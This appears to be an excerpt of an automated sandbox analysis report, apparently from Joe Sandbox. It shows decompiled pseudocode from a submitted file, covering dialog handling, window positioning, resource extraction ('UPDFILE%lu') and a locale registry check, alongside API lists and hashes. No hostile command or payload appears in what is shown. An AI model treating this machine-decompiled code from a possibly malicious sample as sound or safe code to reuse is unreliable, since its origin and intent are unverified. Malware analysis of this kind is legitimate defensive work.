                                                                                                                                                                                                                                                					SetDlgItemTextA(_t24, 0x838,  *0x59404);
                                                                                                                                                                                                                                                					SetForegroundWindow(_t24);
                                                                                                                                                                                                                                                					goto L11;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				if(_t11 == 1) {
                                                                                                                                                                                                                                                					_t22 = _a12;
                                                                                                                                                                                                                                                					if(_t22 < 6) {
                                                                                                                                                                                                                                                						goto L11;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					if(_t22 <= 7) {
                                                                                                                                                                                                                                                						L8:
                                                                                                                                                                                                                                                						EndDialog(_a4, _t22);
                                                                                                                                                                                                                                                						return 1;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					if(_t22 != 0x839) {
                                                                                                                                                                                                                                                						goto L11;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					 *0x591dc = 1;
                                                                                                                                                                                                                                                					goto L8;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return 0;
                                                                                                                                                                                                                                                			}








                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005347c
                                                                                                                                                                                                                                                0x0005348c
                                                                                                                                                                                                                                                0x00053490
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053496
                                                                                                                                                                                                                                                0x00053484
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053486
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053486
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • EndDialog.USER32(?,?), ref: 00053490
                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 0005349A
                                                                                                                                                                                                                                                • SetWindowTextA.USER32(?,lenta), ref: 000534B2
                                                                                                                                                                                                                                                • SetDlgItemTextA.USER32(?,00000838), ref: 000534C4
                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 000534CB
                                                                                                                                                                                                                                                • EndDialog.USER32(?,00000002), ref: 000534D8
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                                                                • String ID: lenta
                                                                                                                                                                                                                                                • API String ID: 852535152-2780258678
                                                                                                                                                                                                                                                • Opcode ID: 366a248d2075e2843676df32d784047c41e6698a2caef46ef98263efb1511576
                                                                                                                                                                                                                                                • Instruction ID: 6007708ce5c49b93b142c60f4a184aa38ee95b18575ff5d4e3463ef970026c57
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 366a248d2075e2843676df32d784047c41e6698a2caef46ef98263efb1511576
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7801D831340614ABE7265F64DC0C96F3B54EB06783F008510FE46865A0CB34AF45DF85
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 95%
                                                                                                                                                                                                                                                			E00052AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t16;
                                                                                                                                                                                                                                                				int _t21;
                                                                                                                                                                                                                                                				char _t32;
                                                                                                                                                                                                                                                				intOrPtr _t34;
                                                                                                                                                                                                                                                				char* _t38;
                                                                                                                                                                                                                                                				char _t42;
                                                                                                                                                                                                                                                				char* _t44;
                                                                                                                                                                                                                                                				CHAR* _t52;
                                                                                                                                                                                                                                                				intOrPtr* _t55;
                                                                                                                                                                                                                                                				CHAR* _t59;
                                                                                                                                                                                                                                                				void* _t62;
                                                                                                                                                                                                                                                				CHAR* _t64;
                                                                                                                                                                                                                                                				CHAR* _t65;
                                                                                                                                                                                                                                                				signed int _t66;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t60 = __edx;
                                                                                                                                                                                                                                                				_t16 =  *0x58004; // 0x5a679bd9
                                                                                                                                                                                                                                                				_t17 = _t16 ^ _t66;
                                                                                                                                                                                                                                                				_v8 = _t16 ^ _t66;
                                                                                                                                                                                                                                                				_t65 = _a4;
                                                                                                                                                                                                                                                				_t44 = __edx;
                                                                                                                                                                                                                                                				_t64 = __ecx;
                                                                                                                                                                                                                                                				if( *((char*)(__ecx)) != 0) {
                                                                                                                                                                                                                                                					GetModuleFileNameA( *0x59a3c,  &_v268, 0x104);
                                                                                                                                                                                                                                                					while(1) {
                                                                                                                                                                                                                                                						_t17 =  *_t64;
                                                                                                                                                                                                                                                						if(_t17 == 0) {
                                                                                                                                                                                                                                                							break;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t21 = IsDBCSLeadByte(_t17);
                                                                                                                                                                                                                                                						 *_t65 =  *_t64;
                                                                                                                                                                                                                                                						if(_t21 != 0) {
                                                                                                                                                                                                                                                							_t65[1] = _t64[1];
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						if( *_t64 != 0x23) {
                                                                                                                                                                                                                                                							L19:
                                                                                                                                                                                                                                                							_t65 = CharNextA(_t65);
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							_t64 = CharNextA(_t64);
                                                                                                                                                                                                                                                							if(CharUpperA( *_t64) != 0x44) {
                                                                                                                                                                                                                                                								if(CharUpperA( *_t64) != 0x45) {
                                                                                                                                                                                                                                                									if( *_t64 == 0x23) {
                                                                                                                                                                                                                                                										goto L19;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									E00051680(_t65, E000517C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                                                                									_t52 = _t65;
                                                                                                                                                                                                                                                									_t14 =  &(_t52[1]); // 0x2
                                                                                                                                                                                                                                                									_t60 = _t14;
                                                                                                                                                                                                                                                									do {
                                                                                                                                                                                                                                                										_t32 =  *_t52;
                                                                                                                                                                                                                                                										_t52 =  &(_t52[1]);
                                                                                                                                                                                                                                                									} while (_t32 != 0);
                                                                                                                                                                                                                                                									goto L17;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								E000565E8( &_v268);
                                                                                                                                                                                                                                                								_t55 =  &_v268;
                                                                                                                                                                                                                                                								_t62 = _t55 + 1;
                                                                                                                                                                                                                                                								do {
                                                                                                                                                                                                                                                									_t34 =  *_t55;
                                                                                                                                                                                                                                                									_t55 = _t55 + 1;
                                                                                                                                                                                                                                                								} while (_t34 != 0);
                                                                                                                                                                                                                                                								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                                                                                                                                                                                                								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                                                                                                                                                                                                									 *_t38 = 0;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								E00051680(_t65, E000517C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                                                                								_t59 = _t65;
                                                                                                                                                                                                                                                								_t12 =  &(_t59[1]); // 0x2
                                                                                                                                                                                                                                                								_t60 = _t12;
                                                                                                                                                                                                                                                								do {
                                                                                                                                                                                                                                                									_t42 =  *_t59;
                                                                                                                                                                                                                                                									_t59 =  &(_t59[1]);
                                                                                                                                                                                                                                                								} while (_t42 != 0);
                                                                                                                                                                                                                                                								L17:
                                                                                                                                                                                                                                                								_t65 =  &(_t65[_t52 - _t60]);
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t64 = CharNextA(_t64);
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					 *_t65 = _t17;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E00056CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                                                                                                                                                                                                			}























                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00052AE6
                                                                                                                                                                                                                                                • IsDBCSLeadByte.KERNEL32(00000000), ref: 00052AF2
                                                                                                                                                                                                                                                • CharNextA.USER32(?), ref: 00052B12
                                                                                                                                                                                                                                                • CharUpperA.USER32 ref: 00052B1E
                                                                                                                                                                                                                                                • CharPrevA.USER32(?,?), ref: 00052B55
                                                                                                                                                                                                                                                • CharNextA.USER32(?), ref: 00052BD4
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 571164536-0
                                                                                                                                                                                                                                                • Opcode ID: 3077ddff05c9bf5ef79afec710c75e6781f688ee147de71d170beb5d8fa8786c
                                                                                                                                                                                                                                                • Instruction ID: 598670ae1da5c34995d6897d0cf4dedcb4dd6fdd7646e268f337db7b61a376cd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3077ddff05c9bf5ef79afec710c75e6781f688ee147de71d170beb5d8fa8786c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FD4105346082459FEB559F348C54AFF7BA99F57302F14019AECC293202DB394E8ACBA1
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                                                                                                                			E000543D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				struct tagRECT _v24;
                                                                                                                                                                                                                                                				struct tagRECT _v40;
                                                                                                                                                                                                                                                				struct HWND__* _v44;
                                                                                                                                                                                                                                                				intOrPtr _v48;
                                                                                                                                                                                                                                                				int _v52;
                                                                                                                                                                                                                                                				intOrPtr _v56;
                                                                                                                                                                                                                                                				int _v60;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t29;
                                                                                                                                                                                                                                                				void* _t53;
                                                                                                                                                                                                                                                				intOrPtr _t56;
                                                                                                                                                                                                                                                				int _t59;
                                                                                                                                                                                                                                                				struct HWND__* _t63;
                                                                                                                                                                                                                                                				struct HWND__* _t67;
                                                                                                                                                                                                                                                				struct HWND__* _t68;
                                                                                                                                                                                                                                                				struct HDC__* _t69;
                                                                                                                                                                                                                                                				int _t72;
                                                                                                                                                                                                                                                				signed int _t74;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t63 = __edx;
                                                                                                                                                                                                                                                				_t29 =  *0x58004; // 0x5a679bd9
                                                                                                                                                                                                                                                				_v8 = _t29 ^ _t74;
                                                                                                                                                                                                                                                				_t68 = __edx;
                                                                                                                                                                                                                                                				_v44 = __ecx;
                                                                                                                                                                                                                                                				GetWindowRect(__ecx,  &_v40);
                                                                                                                                                                                                                                                				_t53 = _v40.bottom - _v40.top;
                                                                                                                                                                                                                                                				_v48 = _v40.right - _v40.left;
                                                                                                                                                                                                                                                				GetWindowRect(_t68,  &_v24);
                                                                                                                                                                                                                                                				_v56 = _v24.bottom - _v24.top;
                                                                                                                                                                                                                                                				_t69 = GetDC(_v44);
                                                                                                                                                                                                                                                				_v52 = GetDeviceCaps(_t69, 8);
                                                                                                                                                                                                                                                				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                                                                                                                                                                                                				ReleaseDC(_v44, _t69);
                                                                                                                                                                                                                                                				_t56 = _v48;
                                                                                                                                                                                                                                                				asm("cdq");
                                                                                                                                                                                                                                                				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                                                                                                                                                                                                				_t67 = 0;
                                                                                                                                                                                                                                                				if(_t72 >= 0) {
                                                                                                                                                                                                                                                					_t63 = _v52;
                                                                                                                                                                                                                                                					if(_t72 + _t56 > _t63) {
                                                                                                                                                                                                                                                						_t72 = _t63 - _t56;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_t72 = _t67;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				asm("cdq");
                                                                                                                                                                                                                                                				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                                                                                                                                                                                                				if(_t59 >= 0) {
                                                                                                                                                                                                                                                					_t63 = _v60;
                                                                                                                                                                                                                                                					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                                                                						_t59 = _t63 - _t53;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_t59 = _t67;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E00056CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                                                                                                                                                                                                			}

























                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 000543F1
                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 0005440B
                                                                                                                                                                                                                                                • GetDC.USER32(?), ref: 00054423
                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 0005442E
                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0005443A
                                                                                                                                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00054447
                                                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 000544A2
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
• Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2212493051-0
                                                                                                                                                                                                                                                • Opcode ID: 541e3adef85171417b296af084ed5e1a1531c5ff70f145e1ac9e47e34824374d
                                                                                                                                                                                                                                                • Instruction ID: 52f2ee5aac54e88fb228df9662ba7ff62af92bdd99ef7843dbf488bf17ffa1f6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 541e3adef85171417b296af084ed5e1a1531c5ff70f145e1ac9e47e34824374d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 81313C32E00619AFDB14CFB8DD889EFBBB5EB89311F154269E905B3240DA346C458B60
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 53%
                                                                                                                                                                                                                                                			E00056298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v28;
                                                                                                                                                                                                                                                				intOrPtr _v32;
                                                                                                                                                                                                                                                				struct HINSTANCE__* _v36;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t16;
                                                                                                                                                                                                                                                				struct HRSRC__* _t21;
                                                                                                                                                                                                                                                				intOrPtr _t26;
                                                                                                                                                                                                                                                				void* _t30;
                                                                                                                                                                                                                                                				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                                				intOrPtr* _t40;
                                                                                                                                                                                                                                                				void* _t41;
                                                                                                                                                                                                                                                				intOrPtr* _t44;
                                                                                                                                                                                                                                                				intOrPtr* _t45;
                                                                                                                                                                                                                                                				void* _t47;
                                                                                                                                                                                                                                                				signed int _t50;
                                                                                                                                                                                                                                                				struct HINSTANCE__* _t51;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t44 = __edx;
                                                                                                                                                                                                                                                				_t16 =  *0x58004; // 0x5a679bd9
                                                                                                                                                                                                                                                				_v8 = _t16 ^ _t50;
                                                                                                                                                                                                                                                				_t46 = 0;
                                                                                                                                                                                                                                                				_v32 = __ecx;
                                                                                                                                                                                                                                                				_v36 = 0;
                                                                                                                                                                                                                                                				_t36 = 1;
                                                                                                                                                                                                                                                				E0005171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                                                                					_t51 = _t51 + 0x10;
                                                                                                                                                                                                                                                					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                                                                                                                                                                                                					if(_t21 == 0) {
                                                                                                                                                                                                                                                						break;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                                                                                                                                                                                                					if(_t45 == 0) {
                                                                                                                                                                                                                                                						 *0x59124 = 0x80070714;
                                                                                                                                                                                                                                                						_t36 = _t46;
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						_t5 = _t45 + 8; // 0x8
                                                                                                                                                                                                                                                						_t44 = _t5;
                                                                                                                                                                                                                                                						_t40 = _t44;
                                                                                                                                                                                                                                                						_t6 = _t40 + 1; // 0x9
                                                                                                                                                                                                                                                						_t47 = _t6;
                                                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                                                							_t26 =  *_t40;
                                                                                                                                                                                                                                                							_t40 = _t40 + 1;
                                                                                                                                                                                                                                                						} while (_t26 != 0);
                                                                                                                                                                                                                                                						_t41 = _t40 - _t47;
                                                                                                                                                                                                                                                						_t46 = _t51;
                                                                                                                                                                                                                                                						_t7 = _t41 + 1; // 0xa
                                                                                                                                                                                                                                                						 *0x5a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                                                                                                                                                                                                						_t30 = _v32();
                                                                                                                                                                                                                                                						if(_t51 != _t51) {
                                                                                                                                                                                                                                                							asm("int 0x29");
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_push(_t45);
                                                                                                                                                                                                                                                						if(_t30 == 0) {
                                                                                                                                                                                                                                                							_t36 = 0;
                                                                                                                                                                                                                                                							FreeResource(??);
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							FreeResource();
                                                                                                                                                                                                                                                							_v36 = _v36 + 1;
                                                                                                                                                                                                                                                							E0005171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                                                                                                                                                                                                							_t46 = 0;
                                                                                                                                                                                                                                                							continue;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					L12:
                                                                                                                                                                                                                                                					return E00056CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				goto L12;
                                                                                                                                                                                                                                                			}























                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 0005171E: _vsnprintf.MSVCRT ref: 00051750
                                                                                                                                                                                                                                                • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,000551CA,00000004,00000024,00052F71,?,00000002,00000000), ref: 000562CD
                                                                                                                                                                                                                                                • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,000551CA,00000004,00000024,00052F71,?,00000002,00000000), ref: 000562D4
                                                                                                                                                                                                                                                • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,000551CA,00000004,00000024,00052F71,?,00000002,00000000), ref: 0005631B
                                                                                                                                                                                                                                                • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00056345
                                                                                                                                                                                                                                                • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,000551CA,00000004,00000024,00052F71,?,00000002,00000000), ref: 00056357
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                                                                • String ID: UPDFILE%lu
                                                                                                                                                                                                                                                • API String ID: 2922116661-2329316264
                                                                                                                                                                                                                                                • Opcode ID: bec1bb1d4af10d762aacf75a99e92333ba465b8729cda7bfe777957d37acc5f5
                                                                                                                                                                                                                                                • Instruction ID: 4f7fab1ae323ca6cb3b7df705f8564ca3786adda2d2d7a698a5da2971ecc5582
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bec1bb1d4af10d762aacf75a99e92333ba465b8729cda7bfe777957d37acc5f5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C821B675A00219ABDB109F64DC459FF7B7CEB49716B000219EE02A7241DB3A9D09CBE1
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                                                                                                			E0005681F(void* __ebx) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v20;
                                                                                                                                                                                                                                                				struct _OSVERSIONINFOA _v168;
                                                                                                                                                                                                                                                				void* _v172;
                                                                                                                                                                                                                                                				int* _v176;
                                                                                                                                                                                                                                                				int _v180;
                                                                                                                                                                                                                                                				int _v184;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t19;
                                                                                                                                                                                                                                                				long _t31;
                                                                                                                                                                                                                                                				signed int _t35;
                                                                                                                                                                                                                                                				void* _t36;
                                                                                                                                                                                                                                                				intOrPtr _t41;
                                                                                                                                                                                                                                                				signed int _t44;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t36 = __ebx;
                                                                                                                                                                                                                                                				_t19 =  *0x58004; // 0x5a679bd9
                                                                                                                                                                                                                                                				_v8 = _t19 ^ _t44;
                                                                                                                                                                                                                                                				_t41 =  *0x581d8; // 0x0
                                                                                                                                                                                                                                                				_t43 = 0;
                                                                                                                                                                                                                                                				_v180 = 0xc;
                                                                                                                                                                                                                                                				_v176 = 0;
                                                                                                                                                                                                                                                				if(_t41 == 0xfffffffe) {
                                                                                                                                                                                                                                                					 *0x581d8 = 0;
                                                                                                                                                                                                                                                					_v168.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                                					if(GetVersionExA( &_v168) == 0) {
                                                                                                                                                                                                                                                						L12:
                                                                                                                                                                                                                                                						_t41 =  *0x581d8; // 0x0
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						_t41 = 1;
                                                                                                                                                                                                                                                						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                                                                                                                                                                                                							goto L12;
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							_t31 = RegQueryValueExA(_v172, 0x51140, 0,  &_v184,  &_v20,  &_v180);
                                                                                                                                                                                                                                                							_t43 = _t31;
                                                                                                                                                                                                                                                							RegCloseKey(_v172);
                                                                                                                                                                                                                                                							if(_t31 != 0) {
                                                                                                                                                                                                                                                								goto L12;
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								_t40 =  &_v176;
                                                                                                                                                                                                                                                								if(E000566F9( &_v20,  &_v176) == 0) {
                                                                                                                                                                                                                                                									goto L12;
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									_t35 = _v176 & 0x000003ff;
                                                                                                                                                                                                                                                									if(_t35 == 1 || _t35 == 0xd) {
                                                                                                                                                                                                                                                										 *0x581d8 = _t41;
                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                										goto L12;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E00056CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                                                                                                                                                                                                                			}



















                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0005686E
                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(0000004A), ref: 000568A7
                                                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 000568CC
                                                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,00051140,00000000,?,?,0000000C), ref: 000568F4
                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00056902
                                                                                                                                                                                                                                                  • Part of subcall function 000566F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,0005691A), ref: 00056741
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • Control Panel\Desktop\ResourceLocale, xrefs: 000568C2
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
• Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                                                                • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                                                                • API String ID: 3346862599-1109908249
                                                                                                                                                                                                                                                • Opcode ID: a00ef493ae1fd536f3cdec72e73e88abec64a3cecf1f6fc30f0c02f2d930b5ae
                                                                                                                                                                                                                                                • Instruction ID: 3f4da304592a5320dba743db32a20a4799485235a9f06958623cf8fe871bf67e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a00ef493ae1fd536f3cdec72e73e88abec64a3cecf1f6fc30f0c02f2d930b5ae
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F9317C31B013189FEB218B11CC05BABB7BCEB4572AF4045A5ED49A7240DB359E89CB52
